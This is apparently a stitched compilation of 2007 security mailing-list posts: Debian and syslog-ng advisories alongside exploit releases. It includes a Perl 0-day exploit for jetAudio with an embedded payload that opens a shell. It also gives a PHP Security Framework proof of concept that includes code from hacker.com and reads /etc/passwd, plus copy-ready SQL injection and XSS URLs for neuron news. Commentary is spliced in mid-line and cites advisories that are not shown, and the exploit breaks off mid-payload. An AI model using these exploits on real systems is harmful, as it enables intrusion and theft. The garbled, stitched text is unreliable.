  http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_powerpc.deb
    Si
[SECURITY] [DSA 1433-1] New centericq packages fix execution of code
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1433-1                  [EMAIL PROTECTED]
http://www.debian.org/security/                               Steve Kemp
December 16, 2007                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : centericq
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-3713

Several remote vulnerabilities have been discovered in centericq, a text-mode multi-protocol instant messenger client, which could allow remote attackers to execute arbitrary code due to insufficient bounds-testing.

For the stable distribution (etch), this problem has been fixed in version 4.21.0-18etch1.

For the old stable distribution (sarge), this problem has been fixed in version 4.20.0-1sarge5.

We recommend that you upgrade your centericq package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge5.dsc
    Size/MD5 checksum:      875 0e3de98bb55d5af241acbb7c42c47cd0
  http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge5.diff.gz
    Size/MD5 checksum:   117817 a0d486891cbf0dbafd36acda7d329e7a
  http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0.orig.tar.gz
    Size/MD5 checksum:  1796894 874165f4fbd40e3be677bdd1696cee9d

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge5_alpha.deb
    Size/MD5 checksum:  1651664 69022dfe5342b1056abca9c9b433532d
  http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge5_alpha.deb
    Size/MD5 checksum:   337338 b408f37c75ebff4cca8e0fd9bae2a2e2
  http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge5_alpha.deb
    Size/MD5 checksum:  1652642 b1e027154c70c15250c131bcd1584c30
  http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge5_alpha.deb
    Size/MD5 checksum:  1651712 1fc9e5fbf1d193d8d6ec6c2fa9cf28bf

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge5_amd64.deb
    Size/MD5 checksum:   335496 e89f821a32c11d314b397ee454da5094
  http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge5_amd64.deb
    Size/MD5 checksum:  1355704 f3371f5f48e1057f1fb80714c0ea98bc
  http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge5_amd64.deb
    Size/MD5 checksum:  1355942 dbaa8f53bcddceb3828e3b8b857bf833
  http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge5_amd64.deb
    Size/MD5 checksum:  1355764 2752c6ff95628f99693521617bc32d73

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge5_arm.deb
    Size/MD5 checksum:  2184304 34cd68e7c3f0374c40e545a61446f48c
  http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge5_arm.deb
    Size/MD5 checksum:  2185094 7cbfa8db84b905a267ddf518415a7553
  http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge5_arm.deb
    Size/MD5 checksum:   336124 19e8fc68148e1ebc8dc6a51c2c488689
  http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge5_arm.deb
    Size/MD5 checksum:  2184366 b5ac5dffa73e7273a3e03b91e4413be0

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge5_hppa.deb
    Size/MD5 checksum:  1812692 c21a00400546a5fbf571cf517bd34657
  http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge5_hppa.deb
    Size/MD5 checksum:  1813624 f48400ea56e3027d2e828b3353442131
  http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge5_hppa.deb
    Size/MD5 checksum:   336228 035a6af70173afb011a9a77631bdab3b
  http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge5_hppa.deb
    Size/MD5 checksum:  1812750 10f3220cf0a0334113b4eb6b03e7f63c

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge5_i386.deb
    Size/MD5 checksum:  1350010 fbf767b42da3ffc738073577afea697a
  http://securi
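The three Debian advisories above (DSA-1432, DSA-1434 and DSA-1433) give a URL, a size and an MD5 for every package, and the footer with the apt sources line has not survived in this archive, so a manual `wget` plus `dpkg -i` is the path the text leaves open. As an added example (not Debian's own tooling), this Python parses the "Size/MD5 checksum:" layout used by all three advisories and verifies a downloaded file against it. The excerpt reuses the two mydns source entries from DSA-1434 exactly as they appear above and adds one constructed row for a package that does not exist (example_1.0-1_i386.deb, whose "contents" are the three bytes `abc`, the RFC 1321 MD5 test vector) so the check can run offline.

```python
import hashlib
import re

# One row per file: the URL, then "Size/MD5 checksum: <size> <md5>" on the
# next line. The advisories above sometimes run these together; both match.
ROW = re.compile(
    r"(?P<url>https?://\S+)\s+Size/MD5 checksum:\s*(?P<size>\d+)\s+(?P<md5>[0-9a-f]{32})"
)

# Excerpt: the two mydns source entries from DSA-1434 as printed above, plus one
# constructed row for a package that does not exist (example_1.0-1_i386.deb) whose
# 'contents' are the three bytes b"abc"; md5("abc") is the RFC 1321 test vector.
ADVISORY_EXCERPT = """\
Source archives:

  http://security.debian.org/pool/updates/main/m/mydns/mydns_1.1.0-7etch1.dsc
    Size/MD5 checksum:     1016 6d0a22d23d6a218b2f6c36a0973fec29
  http://security.debian.org/pool/updates/main/m/mydns/mydns_1.1.0-7etch1.diff.gz
    Size/MD5 checksum:    23201 68288d6559240f652b363175077ee372

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/e/example/example_1.0-1_i386.deb
    Size/MD5 checksum:        3 900150983cd24fb0d6963f7d28e17f72
"""


def parse_checksums(advisory_text):
    """Return {filename: (size, md5)} for every row found in the advisory text."""
    table = {}
    for m in ROW.finditer(advisory_text):
        filename = m.group("url").rsplit("/", 1)[-1]
        table[filename] = (int(m.group("size")), m.group("md5"))
    return table


def verify_bytes(filename, data, table):
    """Check a downloaded file's bytes against the advisory row for its name.
    The size is compared first: it is cheap and catches truncated downloads."""
    if filename not in table:
        return False
    size, md5 = table[filename]
    return len(data) == size and hashlib.md5(data).hexdigest() == md5


def verify_file(path, table):
    """Same check for a file on disk, keyed by its basename."""
    with open(path, "rb") as fh:
        return verify_bytes(path.rsplit("/", 1)[-1], fh.read(), table)


if __name__ == "__main__":
    t = parse_checksums(ADVISORY_EXCERPT)
    for name, (size, md5) in t.items():
        print(f"{name}: {size} bytes, md5 {md5}")
    print("constructed package verifies:", verify_bytes("example_1.0-1_i386.deb", b"abc", t))
    print("tampered copy verifies:      ", verify_bytes("example_1.0-1_i386.deb", b"abd", t))
```

Two caveats a practitioner should keep in mind: MD5 is not collision resistant, so these sums catch transfer corruption and crude substitution rather than a capable attacker, and the table is only as trustworthy as the PGP signature on the advisory it came from. Verify that signature before trusting the sums, and prefer apt's signed Release metadata over hand-checked downloads wherever it is available.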
jetAudio 7.0.5 COWON Media Center MP4 Stack Overflow
another vulnerable application.

#!/bin/perl
#
# jetAudio 7.0.5 COWON Media Center MP4 Stack Overflow
#
# 0-day discovered and exploited by SYS 49152
#
# Tested on win XP SP2 ENG
# Shell on port 49152
#
# usage:
# - download the latest 3ivx codec from here:
#   hxxp://www.3ivx.com/codec/3ivx_MPEG-4_501_trial_win.exe
#
# - play the AVI file with COWON Media Center
#
# Maybe I will add more vulnerable apps if I have time.
# SYS 49152
#
# gforce(put the @ here)operamail(put the . here)com

use Archive::Zip qw( :ERROR_CODES :CONSTANTS );

# begin binary data:
$bin_data = # 3289
"\x50\x4B\x03\x04\x14\x00\x00\x00\x08\x00\xDA\x6C\x91\x37\x9C".
"\x4D\x90\x80\x69\x0C\x00\x00\x5C\xC2\x01\x00\x07\x00\x00\x00".
"\x6A\x65\x74\x2E\x61\x76\x69\xED\xD7\x7B\x58\xD4\x55\x1A\x07".
"\xF0\x77\x06\xF0\x82\x97\x47\x4D\xC1\xAC\xA5\x31\xB4\x2C\x03".
"\x61\x00\x05\xB3\x44\x64\xC0\x4C\xC4\x2B\x78\x41\x6C\x60\x46".
"\x19\x61\xB8\xCC\x0C\x20\xA6\x84\x62\x5E\xC9\xAD\xD0\xD2\x92".
"\x15\x4D\x4B\xCB\xA7\x52\x2B\xCD\xB6\xD4\xA7\xCC\x28\xA3\xEC".
"\xAA\x95\xB6\xD9\x45\x58\xDA\x52\x22\xCD\x5B\xED\xFB\xCE\x39".
"\x23\xB8\x3D\x7B\x79\x9E\xDD\x67\xFF\xFA\x7E\xEA\xF5\x9C\xF9".
"\xCD\xEF\x77\x2E\xEF\x39\xBF\x33\x4A\x44\xA6\x59\x9E\xB2\xC2".
"\x94\xE8\x11\x26\x62\x52\x3A\x0B\xA3\xCD\x0E\x77\x81\x53\x3E".
"\x93\xA1\x2E\xD8\x59\x50\x50\xC2\xB5\x3C\x67\x49\x8E\x4D\x2E".
"\xED\x4B\xFB\xC3\xF9\x03\x39\xD3\xBE\x23\x32\x4E\x21\xBA\x79".
"\x11\x19\x48\xFE\x6F\x75\xD5\x87\xDF\x7F\x8E\xA7\x7F\xC9\x48".
"\xD4\xA5\xD6\xE3\xB2\xE6\x72\x3D\xC3\x93\xEB\xED\xB3\xBD\xF4".
"\xB9\x2F\x2D\x44\x5A\xD2\xAD\x71\xBF\x6D\x18\xAE\xFC\xF1\x8F".
"\x17\x5B\xC5\x5F\xF5\xA9\xCB\x30\xA7\xCD\x61\xE5\x8A\xC9\x69".
"\x6B\x9D\x97\xEA\x63\x7B\x22\x75\x9A\x42\x93\xDF\xF0\xDE\xD8".
"\x37\xC7\x96\xE7\xF2\x3D\xE5\x2E\x28\xCE\xA7\xAB\x75\xFE\xC9".
"\xE9\xC8\x9F\xC5\x95\x6E\x6E\xA7\x6A\x48\xEB\x67\x53\xD7\xAF".
"\xB7\xB9\xEC\xB3\xF4\x35\x19\x52\xE7\x62\x57\x9E\x49\xD5\x3B".
"\xEF\x76\x7B\xB2\xF2\xB8\x3E\xDB\xED\x71\xFB\x9E\x95\x7B\xD2".
"\x79\x11\xAC\x6D\x3E\x2B\x46\xEA\x26\x05\x0F\x4F\x44\xD9\xDD". "\x36\xB7\x54\xFC\x2A\x2A\x2A\x6E\xE4\xD2\x9F\xCB\x9E\xF1\xBD". "\xC8\x18\x44\xC6\x61\x5B\xC9\xD0\xFC\x4E\x00\x5F\x31\xF6\xE8". "\xD6\x8E\x0B\x03\xE7\x95\x7A\xBB\x3D\x1E\x77\x6B\xB3\xC6\x4F". "\xF8\x21\xA9\x0F\xE0\xEE\xB3\xAF\x74\xA2\xBA\xEC\xA5\xCB\x50". "\x8E\xCE\xAA\xDE\x29\x8F\xEF\x9B\x47\x57\xC8\xF3\xD4\xFE\xFF". "\x14\xEF\xF2\x10\x2E\x71\xFC\xC4\x21\xF5\x5D\x1C\x1F\x71\x6C". "\xE7\xA8\xE0\xE0\x35\x32\x2C\xD1\xDF\x6D\xE6\x78\x8A\x63\x07". "\xC7\xE3\xFA\xDE\xB5\x1C\xBC\x67\x0D\x3C\x7E\xC3\x06\x8E\x2A". "\x8E\xA7\x39\x38\xCD\x86\xF9\x1C\xEF\xE9\xCF\x7F\xE4\x58\xAF". "\xE3\x63\x8E\x2F\x39\x16\x70\xBC\xCA\x91\xC1\x91\xC5\xB1\x5B". "\xF7\xC9\xCB\x6A\x48\xE1\x78\x94\x83\xDF\x11\xC3\x21\x5D\x5F". "\xAC\xEB\x0F\x72\x3C\xC7\xF1\x08\x07\xE7\xD7\xB0\x8A\xA3\x90". "\x63\x94\xEA\xDF\x18\xC8\x65\x19\xC7\x44\x8E\x34\xDD\x56\x14". "\xC7\x72\x0E\x87\xBE\xB7\x98\xC3\xC3\x91\xC4\x71\x40\xDF\x7F". "\x9C\xE3\x1B\x7D\x7D\x0C\xC7\x6C\x1D\x2E\x5D\xCE\x6B\x53\xDA". "\x74\x3B\x32\xEE\xFB\x38\xEC\xFA\x3E\x99\xFF\x43\x3A\x16\x72". "\x3C\xC6\xB1\x93\xE3\x7E\x1D\x72\x5D\xC6\xBD\x9A\x54\x2E\xD7". "\xEA\xFA\x33\xFA\x5E\xC9\xC7\xD7\x1C\x17\x48\xCD\xF1\x61\x52". "\xF3\xE3\x73\xC3\x9B\x17\x5F\xAE\x64\x9C\x8B\xF4\xB3\x2F\xE8". "\xF2\x45\x8E\xEF\x39\x4E\x70\xAC\x21\x35\xBE\x39\xD4\xBA\x96". "\x6F\x72\xEC\x25\x95\x7F\x19\xAB\xAC\xD1\xEB\x1C\xF7\xE8\xF6". "\xF9\x1D\xF4\xE6\x5B\xD6\x56\xF2\x54\x4A\x6A\xED\xA5\xED\x7B". "\x39\xAA\x49\xE5\xE9\x0B\x8E\xBF\x92\x5A\x4B\xC9\xA9\x8C\x43". "\xD6\x77\x2E\xC7\x36\x8E\xA5\xFA\x7E\x99\xAB\xCC\x21\x87\xD4". "\x38\xEC\xFA\x79\xC9\xFD\x3C\xDD\x47\xDB\x79\xF1\xD9\x64\x58". "\xC6\x51\xCB\xB1\x55\x97\xF2\x5C\xB9\xBE\x3F\x5F\x7F\x96\xFB". "\x65\x6C\x45\xBA\xCD\x3A\x8E\xCF\x49\x8D\x63\xA1\xEE\x9F\xDF". "\x47\x6F\xBE\x57\x90\xCA\x97\xB4\x2D\x6B\xE6\xD2\xED\x48\x3E". "\x64\xDD\x66\xEB\xE7\x64\x6F\xC9\x5C\x65\x6F\x7F\x40\x6A\x2F". "\xCB\xF5\x55\xFA\xBE\xFB\xF4\x33\xB2\x37\x64\xDE\x0B\x74\xFB". 
"\xF3\x75\xBB\xF2\x7D\x3D\xA9\x77\x41\xD6\xC0\xA9\xFB\x92\xFB". "\x65\x8C\x32\x66\xB7\xEE\x5B\xFA\x9C\xAE\xAF\xF3\xB3\x7C\xB0". "\xA8\xF5\x92\x79\xCA\xFC\x72\xDA\xDC\x3B\x5D\xDF\x2F\x39\x93". "\x9C\x4A\x1E\x7C\x63\x9D\xAF\xEB\xCB\xF5\x67\x59\xE7\x3D\x1C". "\x9B\x48\x8D\x51\xDA\x94\xB9\xC8\x78\x66\xE8\x67\xFF\x46\x6A". "\x1D\xA5\x2E\xEB\x25\x7B\xA5\x80\xD4\x7B\x24\xE3\x29\xD2\xFD". "\xF8\xE6\x27\xB9\x7C\x5C\xF7\x25\x73\x91\x1C\xC8\x1E\xFA\x5A". "\xDF\x2B\x21\x6B\xF1\x29\xA9\xFD\x2C\x7B\x45\x72\x26\x7B\x44". "\xF6\x6E\x96\xEE\x47\xE6\x94\xDB\xE6\x99\x32\xDD\x5F\xAE\xBE". "\x5F\xEE\x95\xF7\xE4\x49\x8E\x07\x48\xED\x9D\x23\xA4\xE6\x23". "\x63\x90\x33\xE4\x15\x52\xEF\x88\xEC\xB1\x4A\x8E\x93\xA4\xE6". "\xCA\x47\xBD\x37\xD7\x32\x0F\x99\x97\xBC\x53\xB2\x1E\x35\xA4". "\x72\x20\xE3\x93\xB1\x1F\xD4\xED\x1C\x25\xB5\xB6\x92\x6F\x99". "\xA3\xAC\xB5\xEC\x3B\x19\x97\xEF\x7D\x3E\x4C\x2A\xFF\xF2\xEC". "\x6C\x7D\x5D\x4A\x59\x57\x99\x8
PHP Security Framework: Vuln and Security Bypass
Title: PHP Security Framework (Beta 1) Multiple Vulnerabilities and Security Bypass
Vendor: http://benjilenoob.66ghz.com/projects/
Advisory: http://acid-root.new.fr/?0:16
Author: DarkFig < gmdarkfig (at) gmail (dot) com >
Released on: 2007/12/16
Changelog: 2007/12/16

Summary:
[HT] Remote File Inclusion
[MT] SQL Injection
[MT] SQL Injection Protection Bypass
[__] Conclusion

Legend:
L - Low risk
M - Medium risk
H - High risk
T - Tested

Risk level: High
CVE: --

I - REMOTE FILE INCLUSION

The file "lib/base.inc.php" contains the following code:

10| include_once("$MODEL_DIR/FrameworkPage.class.php");
15| include_once("$COMMON_DIR/adodb/adodb-active-record.inc.php");
26| include_once("$DAO_DIR/Administrator.class.php");
35| include_once("$LOGIC_DIR/AdministratorLogic.class.php");

As you can see, none of these variables is sanitized before being used. This can lead to RFI if the PHP directives allow_url_fopen and allow_url_include are set to On. It can also lead to LFI if the PHP directive magic_quotes_gpc is set to Off.

Proof Of Concept:
http://localhost/PSF/lib/base.inc.php?MODEL_DIR=http://hacker.com/
http://localhost/PSF/lib/base.inc.php?DAO_DIR=/etc/passwd%00

The author shouldn't use variables for the inclusions. The best way to protect against this type of vulnerability is to use constants, because they can't be set through register_globals if they're properly defined (no variables used).

II - SQL INJECTION

The script supports several database servers, Oracle included, so the script must also be secured for this type of database server. In a recent research that I have done, I found that 60% of the PHP scripts which support Oracle aren't safe! People think that if they use the function addslashes() on a string which has quotes, they'll be secured against SQL Injection. On MySQL that's roughly true, but on Oracle that's wrong. The escape character for MySQL is a backslash (ASCII 92, \). The escape character for Oracle is a single quote (ASCII 39, ').
The script has a user interface for the administrators. The file "lib/control/AuthentificationController.class.php" contains the following code:

 4| public function __construct()
 5| {
 6|     $FrameworkPage = FrameworkPage::getInstance();
 7|     $FrameworkPage->setHeadTitle("Authenfication Form");
 8|     $FrameworkPage->setPageTitle("PHPSecurityFramework");
 9|
10|     if(isset($_REQUEST['username']) && isset($_REQUEST['password']))
11|         $this->Login($_REQUEST['username'], $_REQUEST['password']);
12| }
13|
14| public function Login($username, $password)
15| {
16|     $username = addslashes($username);
17|     $password = md5($password);
18|     $AdministratorLogic = new AdministratorLogic();
19|
20|     if($AdministratorLogic->validateAdministrator($username,$password))
22|         session_register('psf_admin');

The function addslashes() is applied to $username, then the function validateAdministrator() is called with two parameters. This function contains the following code:

10| public function validateAdministrator($username, $password)
11| {
12|     if(is_string($username) && is_string($password))
13|     {
14|         $Admin = new Administrator();
15|
16|         if( ($Admin->load("username=?", array($username))) !==false)
17|         {
18|             if($Admin->md5password==$password)
19|                 return true;

The code for the Administrator class is situated in the file "lib/dao/Administrator.class.php":

 2| class Administrator extends ADOdb_Active_Record
 3| {
 4|     public $_table = 'psf_administrator';
 5| }

The function load() contains this code (situated in "lib/common/adodb/adodb-active-record.inc.php"):

384| function Load($where,$bindarr=false)
385| {
386|     $db =& $this->DB(); if (!$db) return false;
387|     $this->_where = $where;
388|
389|     $save = $db->SetFetchMode(ADODB_FETCH_NUM);
390|     $row = $db->GetRow("select * from ".$this->_table.' WHERE '.$where,$bindarr);
391|     $db->SetFetchMode($save);
392|
393|     return $this->Set($row);
394| }

I will take an example to explain how it works.
Let's send this HTTP request:

POST /PSF/index.php?page=authentification HTTP/1.1\r\n
Host: localhost\r\n
Connection: keep-alive\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 66\r\n\r\n
username=root%27&password=toor&page=authentification&button=Log+in\r\n\r\n

The SQL request will be like this:

select * from psf_administrator WHERE username='root\\\''

If we're on MySQL there's no problem, but if we're on Oracle, this returns an error: ORA-01756: quoted string not properly terminated.
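To make the advisory's point concrete, here is an added example (not the advisory's code and not PHP Security Framework's) that checks whether a quoted SQL literal is properly terminated under each dialect's escaping rule; the function names and the sample input are my own.

```php
<?php
// Added example, not code from the advisory or from PHP Security Framework.
// It shows why addslashes() only produces a valid literal for a backslash-
// escaping dialect such as MySQL, and why the same literal is malformed for
// Oracle, where the only way to escape a quote is to double it.
// Report whether $sql is one complete, properly terminated string literal.
// $backslashEscapes = true  : MySQL rule, a backslash escapes the next character
// $backslashEscapes = false : Oracle / standard SQL rule, backslash is plain data
function isCompleteLiteral(string $sql, bool $backslashEscapes): bool
{
    $len = strlen($sql);
    if ($len < 2 || $sql[0] !== "'") {
        return false;
    }
    for ($i = 1; $i < $len; $i++) {
        $c = $sql[$i];
        if ($backslashEscapes && $c === '\\') {
            $i++;                           // skip the escaped character
            continue;
        }
        if ($c === "'") {
            if ($i + 1 < $len && $sql[$i + 1] === "'") {
                $i++;                       // '' is an escaped quote in both dialects
                continue;
            }
            return $i === $len - 1;         // closing quote, nothing may follow it
        }
    }
    return false;                           // ran off the end: unterminated
}

// The two quoting conventions the advisory contrasts.
function quoteMysqlStyle(string $v): string
{
    return "'" . addslashes($v) . "'";
}
function quoteOracleStyle(string $v): string
{
    return "'" . str_replace("'", "''", $v) . "'";
}

$username  = "root'";                        // constructed input, the advisory's PoC value
$mysqlLit  = quoteMysqlStyle($username);     // 'root\''
$oracleLit = quoteOracleStyle($username);    // 'root'''

var_dump(isCompleteLiteral($mysqlLit, true));   // bool(true)  accepted by MySQL
var_dump(isCompleteLiteral($mysqlLit, false));  // bool(false) Oracle: 'root\' then a stray quote
var_dump(isCompleteLiteral($oracleLit, false)); // bool(true)  accepted by Oracle
```

Neither quoting routine is the real fix: Login() should stop pre-escaping with addslashes() and pass the raw value to the parameterised load() call, so the database layer quotes or binds it for the dialect actually in use.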
Re: [syslog-ng] ZSA-2007-029: syslog-ng Denial of Service
On Mon, 2007-12-17 at 11:38 +0100, Balazs Scheidler wrote:
> Z o r p S e c u r i t y A d v i s o r y ( Z S A )
> PACKAGE : syslog-ng, syslog-ng-premium-edition
> AFFECTED VERSION: <= 2.0.6, 2.1.8
> FIXED : 2.0.6, 2.1.8

Sorry for the mistake, but the above of course reads that anything "below" 2.0.6 or 2.1.8 is affected, but 2.0.6 and 2.1.8 are fixed.

Sorry for the confusion.

-- 
Bazsi
ZSA-2007-029: syslog-ng Denial of Service
Z o r p S e c u r i t y A d v i s o r y ( Z S A )

PACKAGE : syslog-ng, syslog-ng-premium-edition
AFFECTED VERSION: <= 2.0.6, 2.1.8
FIXED : 2.0.6, 2.1.8
SUMMARY : Denial of Service
TYPE: remote
AFFECTED: all platforms
ZSA-ID : ZSA-2007-029
DATE: Dec 14, 2007

DESCRIPTION:

Oriol Carreras has discovered a security vulnerability in syslog-ng, the multi-platform syslog replacement application developed by BalaBit IT Security.

BACKGROUND:

Earlier versions of syslog-ng Open Source Edition and syslog-ng Premium Edition were vulnerable to a possible Denial of Service. The latest release (2.0.6 for syslog-ng, 2.1.8 for syslog-ng Premium Edition) fixes a segmentation fault (NULL pointer dereference) which occurred when the timestamp of an incoming message did not end with a space character. This is an easy Denial of Service possibility. Apart from the Denial of Service, no further exploits are known to be possible.

FURTHER INFORMATION:

For further information on syslog-ng, visit http://www.balabit.com/network-security/syslog-ng/ or download the documentation of syslog-ng from http://www.balabit.com/support/documentation/

SOLUTION:

We recommend that you update the affected packages immediately, or apply the patch referenced below:
http://git.balabit.hu/?p=bazsi/syslog-ng-2.0.git;a=commitdiff;h=3126ebad217e7fd6356f4733ca33f571aa87a170

DOWNLOAD:

If you are a syslog-ng Open Source Edition user, download the source of the latest release from:
http://www.balabit.com/downloads/files/syslog-ng/sources/2.0/src/

If you are a syslog-ng Premium Edition user, or have a binary subscription for syslog-ng Open Source Edition, download the latest binaries from:
http://www.balabit.com/downloads/files/syslog-ng/binaries/premium-edition/

OR, if you have a platform that is supported by apt-get, use the following apt sources to fetch the latest releases:

Debian GNU/Linux etch:
deb https://USERNAME:[EMAIL PROTECTED]/syslog-ng/premium/ debian-etch/syslog-ng-2.1 syslog-ng-pe

RedHat Enterprise Linux
--- RHEL-4
rpm https://USERNAME:[EMAIL PROTECTED]/syslog-ng/premium/ rhel-4/syslog-ng-2.1 syslog-ng-pe

SUSE 10
--- SUSE 10.0
rpm https://USERNAME:[EMAIL PROTECTED]/syslog-ng/premium/ suse-10.0/syslog-ng-2.1 syslog-ng-pe
--- SUSE 10.1
rpm https://USERNAME:[EMAIL PROTECTED]/syslog-ng/premium/ suse-10.1/syslog-ng-2.1 syslog-ng-pe

HTTP can also be used in place of HTTPS if your version of apt-get does not support the HTTPS protocol. When using plain HTTP, the username and password will not be encrypted.
Re: PHP MySQL Banner Exchange 2.2.1 remote mysql database bug
To fix this bug, the vendor just has to put an .htaccess in the "inc" folder with the following code:

Deny from all

or rename the file to lib.inc.php

Regards
neuron news1.0 Multiple Remote Vulnerabilities (sql injection/xss)
# ...:neuron news1.0 Multiple Remote Vulnerabilities (sql injection/xss)
#
# Virangar Security Team
# www.virangar.org
# www.virangar.net
#
# Discovered By : virangar security team (hadihadi & black.shadowes)
#
# special tnx to: MR.nosrati, MR.hesy, satan, Zahra & all virangar members & all iranian hackerz
# greetz: to my best friend in the world hadi_aryaie2004

vulns:

1. sql injection:
http://site.com/patch/?q='/**/union/**/select/**/1,2,adminmail,4,id/**/from/**/neuronnews_configuration/*

2. xss:
http://site.com/patch/?q=viewtopic&topic=alert(11)
http://site.com/patch/?q=newsarchive&newsyear=alert(11)
http://site.com/patch/?q=newsarchive&newsyear=alert(11)&newsmonth=alert(11)

g00d l0uck